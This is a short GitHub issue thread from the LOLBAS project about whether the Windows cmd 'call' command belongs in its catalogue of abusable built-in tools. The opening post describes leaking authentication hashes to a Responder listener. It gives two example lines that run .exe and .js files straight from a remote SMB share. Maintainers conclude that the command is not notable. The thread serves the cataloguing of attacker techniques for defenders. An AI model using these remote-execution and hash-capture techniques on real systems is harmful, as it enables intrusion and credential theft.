### ISSUE TITLE
call

### ISSUE THREAD

**Issue by zerosum0x0** [LOLBAS-Project/LOLBAS#30]
call is used to "call one batch program from another", but has some interesting properties when combined with UNC paths.

It can be used to send hashes to a Responder listener, much like you would do with net.exe, because it authenticates with SMB (like all UNC paths)

More importantly, it also functions as a convenient download and execute for .bat, .js., .exe, etc. hosted on remote systems.

`call \\192.168.1.28\share\test4.exe`
`call \\192.168.1.28\share\test2.js`

I didn't see anything else in the repo source or other issues about call. Searching the wider Internet is a little difficult as the generic name makes it hard to search for. I have 0 idea if it can be used for whitelist bypasses etc.

**Comment by api0cradle** [comment]
Great find, unfortunately call is part of cmd.exe and not an isolated binary, but you are right. You can make it connect to responder and many of the cmd.exe commands can do that. I believe that using "call \\unc\file.exe" will be excactly the same as "\\unc\file.exe" from the cmd prompt.

**Comment by zerosum0x0** [comment]
Ah yea it is not an executable and is exactly like using the command directly. 

It is good for some of my purposes but not really notable for lolbas imo
